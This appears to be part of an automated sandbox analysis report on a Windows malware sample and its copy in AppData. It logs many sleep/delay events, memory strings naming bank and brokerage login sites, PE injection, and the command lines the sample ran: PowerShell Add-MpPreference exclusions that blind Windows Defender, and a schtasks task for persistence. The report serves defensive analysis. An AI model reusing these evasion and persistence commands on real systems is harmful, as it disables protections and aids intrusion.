Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -595500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -595390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -595281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -595172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -595062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -594953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -594844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -594733s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe TID: 7640	Thread sleep time: -594625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7588	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7872	Thread sleep count: 7663 > 30
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7872	Thread sleep count: 2188 > 30
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -599766s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -599641s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -599531s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -599422s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -599285s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -599156s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -599047s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -598937s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -598828s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -598718s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -598609s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -598499s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -598390s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -598281s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -598172s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -598062s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -597953s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -597843s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -597730s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -597609s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -597500s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -597390s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -597281s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -597172s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -597062s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -596948s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -596828s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -596687s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -596578s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -596469s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -596331s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -596203s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -596092s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -595984s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -595872s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -595766s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -595654s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -595547s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -595437s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -595328s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -595219s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -595094s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -594984s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -594874s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -594766s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -594656s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -594547s >= -30000s
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe TID: 7864	Thread sleep time: -594437s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 599016	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 598577	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 598465	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 598134	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 597795	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 597466	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 596702	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 594733	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 599641
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 599531
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 599422
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 599285
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 599156
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 599047
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 598937
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 598828
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 598718
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 598609
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 598499
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 598390
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 598281
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 598172
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 598062
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 597953
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 597843
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 597730
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 597609
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 597500
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 597390
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 597281
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 597172
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 597062
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 596948
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 596828
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 596687
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 596578
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 596469
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 596331
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 596203
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 596092
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 595984
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 595872
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 595766
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 595654
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 595547
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 595437
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 595328
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 595219
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 595094
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 594984
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 594874
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 594766
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 594656
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 594547
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Thread delayed: delay time: 594437

Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: Ti5nuRV7y4.exe, 0000000E.00000002.3697123454.0000000001234000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4.0.
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: aoTiGLRa.exe, 00000014.00000002.3696276576.0000000001378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
Source: aoTiGLRa.exe, 00000014.00000002.3704772629.00000000045FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe

Code function: 14_2_06CC9548 LdrInitializeThunk,

14_2_06CC9548

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe"
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aoTiGLRa.exe"
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aoTiGLRa.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe

Memory written: C:\Users\user\Desktop\Ti5nuRV7y4.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aoTiGLRa.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process created: C:\Users\user\Desktop\Ti5nuRV7y4.exe "C:\Users\user\Desktop\Ti5nuRV7y4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process created: C:\Users\user\AppData\Roaming\aoTiGLRa.exe "C:\Users\user\AppData\Roaming\aoTiGLRa.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Queries volume information: C:\Users\user\Desktop\Ti5nuRV7y4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
